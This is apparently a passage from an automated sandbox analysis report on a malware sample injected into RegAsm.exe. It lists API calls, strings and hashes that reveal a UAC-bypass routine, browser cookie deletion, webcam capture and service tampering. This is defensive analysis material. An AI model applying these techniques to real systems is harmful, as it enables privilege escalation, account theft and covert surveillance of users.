                                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 1170836740-1018135373
                                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                APIs
                                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                • API String ID: 1133728706-4073444585
                                                                                • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                                • String ID: xpF
                                                                                • API String ID: 1852769593-354647465
                                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                APIs
                                                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                • _free.LIBCMT ref: 00450FC8
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 00450FD3
                                                                                • _free.LIBCMT ref: 00450FDE
                                                                                • _free.LIBCMT ref: 00451032
                                                                                • _free.LIBCMT ref: 0045103D
                                                                                • _free.LIBCMT ref: 00451048
                                                                                • _free.LIBCMT ref: 00451053
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                APIs
                                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                • _free.LIBCMT ref: 100092AB
                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                • _free.LIBCMT ref: 100092B6
                                                                                • _free.LIBCMT ref: 100092C1
                                                                                • _free.LIBCMT ref: 10009315
                                                                                • _free.LIBCMT ref: 10009320
                                                                                • _free.LIBCMT ref: 1000932B
                                                                                • _free.LIBCMT ref: 10009336
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                • int.LIBCPMT ref: 004111BE
                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                • String ID: (mG
                                                                                • API String ID: 2536120697-4059303827
                                                                                • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                • CoUninitialize.OLE32 ref: 00407664
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                • API String ID: 3851391207-1839356972
                                                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                                                Strings
                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                • UserProfile, xrefs: 0040BAE8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast
                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                • API String ID: 2018770650-304995407
                                                                                • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 0043ACE9
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                • __allrem.LIBCMT ref: 0043AD1C
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                • __allrem.LIBCMT ref: 0043AD51
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologSleep
                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                • API String ID: 3469354165-3054508432
                                                                                • Opcode ID: 18da6155d95f6aa4cbed861c7fa3d16b08516d870a7c00cd1f1401118ad4f6f5
                                                                                • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                • Opcode Fuzzy Hash: 18da6155d95f6aa4cbed861c7fa3d16b08516d870a7c00cd1f1401118ad4f6f5
                                                                                • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe
                                                                                • String ID:
                                                                                • API String ID: 4189289331-0
                                                                                • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                APIs
                                                                                • _strlen.LIBCMT ref: 10001607
                                                                                • _strcat.LIBCMT ref: 1000161D
                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                • String ID:
                                                                                • API String ID: 1922816806-0
                                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                APIs
                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                • String ID:
                                                                                • API String ID: 3594823470-0
                                                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                • String ID:
                                                                                • API String ID: 493672254-0
                                                                                • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                • _free.LIBCMT ref: 004482CC
                                                                                • _free.LIBCMT ref: 004482F4
                                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                • _abort.LIBCMT ref: 00448313
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                • _free.LIBCMT ref: 10005B2D
                                                                                • _free.LIBCMT ref: 10005B55
                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                • _abort.LIBCMT ref: 10005B74
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
